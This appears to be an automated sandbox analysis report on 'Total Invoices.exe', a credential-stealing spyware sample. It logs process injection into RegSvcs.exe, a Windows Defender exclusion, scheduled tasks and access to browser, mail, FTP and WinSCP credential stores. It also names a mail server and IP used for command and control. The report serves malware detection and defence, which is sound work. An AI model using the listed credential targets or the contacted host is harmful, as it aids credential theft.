                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll | VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Queries volume information: C:\Users\user\AppData\Roaming\dWXyZYb.exe | VolumeInformation
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Queries volume information: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | VolumeInformation
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll | VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Total Invoices.exe.4ebf748.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.dWXyZYb.exe.4055278.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Total Invoices.exe.4efa768.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.dWXyZYb.exe.401a258.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Total Invoices.exe.4efa768.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.dWXyZYb.exe.4055278.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.dWXyZYb.exe.401a258.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.1802303133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2882242292.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1804990629.00000000030BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2882242292.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1804990629.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1804990629.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1833905348.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1732168754.0000000004EBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2882242292.000000000282C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Total Invoices.exe PID: 7088, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7372, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: dWXyZYb.exe PID: 7480, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7780, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Total Invoices.exe.4ebf748.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.dWXyZYb.exe.4055278.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Total Invoices.exe.4efa768.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.dWXyZYb.exe.401a258.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Total Invoices.exe.4efa768.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.dWXyZYb.exe.4055278.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.dWXyZYb.exe.401a258.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.1802303133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1804990629.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1833905348.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1732168754.0000000004EBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2882242292.000000000282C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Total Invoices.exe PID: 7088, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7372, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: dWXyZYb.exe PID: 7480, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7780, type: MEMORYSTR

                      Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Total Invoices.exe.4ebf748.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.dWXyZYb.exe.4055278.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Total Invoices.exe.4efa768.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.dWXyZYb.exe.401a258.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Total Invoices.exe.4efa768.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.dWXyZYb.exe.4055278.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.dWXyZYb.exe.401a258.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.1802303133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2882242292.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1804990629.00000000030BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2882242292.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1804990629.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1804990629.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1833905348.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1732168754.0000000004EBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2882242292.000000000282C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Total Invoices.exe PID: 7088, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7372, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: dWXyZYb.exe PID: 7480, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7780, type: MEMORYSTR
MITRE ATT&CK Matrix

One line per tactic. The number in parentheses after a technique is the hit-count badge the report shows for that cell; techniques without a number are the matrix background and were not observed.

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies | Network Topology
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless | Malvertising
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise | Exploit Public-Facing Application
Execution: Windows Management Instrumentation (121) | Scheduled Task/Job (1) | At | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job | Command and Scripting Interpreter
Persistence: DLL Side-Loading (1) | Scheduled Task/Job (1) | Registry Run Keys / Startup Folder (1) | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job | At
Privilege Escalation: DLL Side-Loading (1) | Process Injection (311) | Scheduled Task/Job (1) | Registry Run Keys / Startup Folder (1) | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job | At
Defense Evasion: Disable or Modify Tools (11) | Deobfuscate/Decode Files or Information (1) | Obfuscated Files or Information (2) | Software Packing (12) | DLL Side-Loading (1) | Masquerading (1) | Virtualization/Sandbox Evasion (141) | Process Injection (311) | Hidden Files and Directories (1)
Credential Access: OS Credential Dumping (2) | Input Capture (1) | Credentials in Registry (1) | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem | /etc/passwd and /etc/shadow
Discovery: File and Directory Discovery (1) | System Information Discovery (24) | Security Software Discovery (211) | Process Discovery (1) | Virtualization/Sandbox Evasion (141) | Application Window Discovery (1) | Remote System Discovery | System Owner/User Discovery | Network Sniffing
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services | Direct Cloud VM Connections
Collection: Archive Collected Data (11) | Data from Local System (2) | Email Collection (1) | Input Capture (1) | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking | Data Staged
Command and Control: Encrypted Channel (1) | Non-Application Layer Protocol (1) | Application Layer Protocol (1) | Protocol Impersonation | Fallback Channels | Multiband Communication | Commonly Used Port | Application Layer Protocol | Web Protocols
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol | Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement | Internal Defacement
Behavior Graph

Behavior Graph ID: 1430700 | Sample: Total Invoices.exe | Start date: 24/04/2024 | Architecture: WINDOWS | Score: 100
Network: mail.unitechautomations.com
Top-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures

Process tree recovered from the graph:

Total Invoices.exe
    dropped: C:\Users\user\AppData\Roaming\dWXyZYb.exe (PE32); C:\Users\user\AppData\Local\...\tmp3C54.tmp (XML)
    signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender
    RegSvcs.exe
        network: mail.unitechautomations.com 192.185.129.60, ports 49735, 49736, 587 (UNIFIEDLAYER-AS-1US, United States)
        dropped: C:\Users\user\AppData\Roaming\...\GUIVTme.exe (PE32)
        signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Hides that the sample has been downloaded from the Internet (zone.identifier)
    powershell.exe
        signatures: Loading BitLocker PowerShell Module
        conhost.exe
        WmiPrvSE.exe
    powershell.exe
        conhost.exe
    schtasks.exe
        conhost.exe
dWXyZYb.exe
    signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
    RegSvcs.exe
        signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
    schtasks.exe
        conhost.exe
GUIVTme.exe
    conhost.exe
GUIVTme.exe
    conhost.exe

Source | Detection | Scanner | Label
Total Invoices.exe | 61% | ReversingLabs | ByteCode-MSIL.Spyware.Negasteal
Total Invoices.exe | 32% | Virustotal |
Total Invoices.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\dWXyZYb.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | 0% | Virustotal |
C:\Users\user\AppData\Roaming\dWXyZYb.exe | 61% | ReversingLabs | ByteCode-MSIL.Spyware.Negasteal
C:\Users\user\AppData\Roaming\dWXyZYb.exe | 32% | Virustotal |

The 0% results for GUIVTme.exe deserve attention rather than reassurance: the behavior graph shows it being written by the injected RegSvcs.exe and later running as its own process, so scanning that file in isolation would miss the infection.

No Antivirus matches

Source | Detection | Scanner | Label
mail.unitechautomations.com | 1% | Virustotal |

Source | Detection | Scanner | Label
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
